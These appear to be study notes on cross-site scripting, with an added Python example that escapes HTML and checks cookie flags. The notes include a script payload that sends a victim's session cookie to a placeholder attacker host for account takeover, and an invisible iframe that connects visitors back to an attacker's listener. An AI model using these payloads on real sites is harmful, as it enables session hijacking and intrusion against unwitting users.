Special characters to test with:

  • <>
  • '
  • "
  • {}
  • ;

Step 1: try entering these in comment sections (or any other input that is reflected back on the page) to see how they are displayed.

If you inspect the page source and still see those raw characters (not encoded), it's vulnerable!

If input is not properly filtered (in PHP), the htmlspecialchars() function should be used to sanitize it; it converts key characters into HTML entities so the browser renders them as text instead of markup.

Step 2: the famous <script>alert()</script> proof of concept.

Step 3: Steal cookies and session info

What are cookies and what can we do with them?

Cookies -> websites use them to track state information about users. Cookies can be set with optional flags (they are not required). We want to look for the Secure and HttpOnly flags:

  • Secure flag - instructs the browser to only send the cookie over encrypted (HTTPS) connections.

  • HttpOnly flag - denies JavaScript access to the cookie. If it's not set, the cookie can easily be stolen with an XSS.

The following script sends a GET request to the attacker's machine and forces the victim's browser to send its cookie (PHPSESSID) along with it.
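An added example (not from the notes) that turns both checks into code: a Python equivalent of what PHP's htmlspecialchars() does with ENT_QUOTES for the Step 1 test characters, and a small Set-Cookie auditor that reports whether a session cookie is missing Secure or HttpOnly. The function names and the sample header values are my own.

```python
"""Defender-side checks for the two XSS notes above (added example, not from the notes)."""

# Order matters: '&' must be escaped first, otherwise the entities we emit
# would themselves be re-escaped.
_HTML_ENTITIES = [
    ("&", "&amp;"),
    ("<", "&lt;"),
    (">", "&gt;"),
    ('"', "&quot;"),
    ("'", "&#039;"),  # htmlspecialchars() with ENT_QUOTES emits &#039; for a single quote
]


def escape_for_html(text: str) -> str:
    """Convert the characters that can open markup into HTML entities,
    mirroring PHP's htmlspecialchars($text, ENT_QUOTES)."""
    for raw, entity in _HTML_ENTITIES:
        text = text.replace(raw, entity)
    return text


def audit_set_cookie(header_value: str) -> dict:
    """Parse the value of a Set-Cookie response header and report which of the
    two protective flags (Secure, HttpOnly) are missing.

    Example input: 'PHPSESSID=abc123; Path=/; HttpOnly; Secure'
    """
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.lower() for p in parts[1:]}
    missing = [flag for flag in ("Secure", "HttpOnly") if flag.lower() not in attrs]
    return {
        "name": name,
        "missing": missing,
        # Without HttpOnly, document.cookie exposes the value to injected script.
        "readable_by_js": "httponly" not in attrs,
    }


if __name__ == "__main__":
    # Constructed input: the Step 1 test characters inside a comment string.
    comment = "<script>alert('x')</script> \"quoted\" {};"
    print(escape_for_html(comment))
    # Constructed headers: one weak session cookie, one hardened one.
    for header in ("PHPSESSID=abc123; Path=/",
                   "PHPSESSID=abc123; Path=/; HttpOnly; Secure"):
        print(audit_set_cookie(header))
```

Note that `{}` and `;` pass through unchanged: htmlspecialchars() only neutralises the characters that matter for HTML markup, which is why the notes list them separately as test characters for other contexts.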

<script>new Image().src="http://Attacker_IP/cool.jpg?output="+document.cookie;</script>

If a user logs into the server, we get a callback and capture the cookie.

Use a cookie editor to add the session info and visit admin-only pages!

The OSCP book didn't cover any non-client-facing XSS.

Client-side attacks:

Invisible iframe

<iframe src=http://attacker_IP/malicious height="0" width="0"></iframe>

People who visit a site containing this invisible iframe will connect back to the attacker's machine! (The attacker can set up a netcat listener to catch the connection.)
